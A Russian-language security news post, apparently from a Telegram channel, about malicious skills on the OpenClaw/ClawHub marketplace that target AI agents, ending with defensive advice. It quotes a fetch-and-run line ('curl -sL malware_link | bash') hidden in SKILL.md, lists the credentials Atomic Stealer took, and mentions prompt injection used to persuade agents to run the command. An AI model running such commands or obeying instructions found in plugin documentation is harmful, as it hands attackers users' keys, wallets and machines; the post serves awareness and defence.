В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.
Что произошло
- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие
Как работала атака
В файле SKILL.md скрывалась инструкция:
curl -sL malware_link | bashПосле выполнения устанавливался Atomic Stealer (macOS), который собирал:
- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain
На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.
Дополнительно
- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз
Почему это важно
ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.
Теперь риск выше, чем в классических supply chain атаках.
Раньше:
— вредоносный пакет выполнялся автоматически
Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам
AI-агенты становятся новой целью supply chain-атак.
Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.
Вывод
Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам
В эпоху агентного AI безопасность важнее удобства.
@linuxkalii
